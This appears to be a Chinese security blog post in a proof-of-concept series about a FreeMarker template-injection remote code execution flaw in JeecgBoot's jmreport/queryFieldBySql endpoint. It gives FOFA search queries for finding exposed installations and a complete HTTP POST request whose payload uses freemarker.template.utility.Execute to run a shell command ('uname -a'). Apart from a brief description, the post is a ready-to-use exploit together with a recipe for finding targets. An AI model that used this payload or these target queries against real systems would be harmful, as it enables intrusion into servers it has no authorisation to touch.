Pages

Menu

Babing
Published on 2024-08-30 / 0 Visits
0
0

J10-5JeecgBoot-企业级低代码平台-RCE

#Pocs

J10-5JeecgBoot-企业级低代码平台-RCE

漏洞描述:

Jeecg Boot jmreport/queryFieldBySql接口存在Freemarker 模板注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。

影响版本:

  • JeecgBoot-企业级

网站图片:

image.webp

网络测绘:

fofa语法:

title==“JeecgBoot 企业级低代码平台” || body=“window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/” || title=“Jeecg-Boot 企业级快速开发平台” || title=“Jeecg 快速开发平台” || body=“'http://fileview.jeecg.com/onlinePreview'” || title==“JeecgBoot 企业级低代码平台” || title==“Jeecg-Boot 企业级快速开发平台” || title==“JeecgBoot 企业级快速开发平台” || title==“JeecgBoot 企业级快速开发平台” || title=“Jeecg 快速开发平台” || title=“Jeecg-Boot 快速开发平台” || body=“积木报表” || body=“jmreport”

漏洞复现:

payload:

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip

{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"uname -a\")}'"}

效果图:
d0d8f5b142d14f79985f866525af32fd.png

J10-7JeecgBoot-企业...
J10-7JeecgBoot-企业...

Comment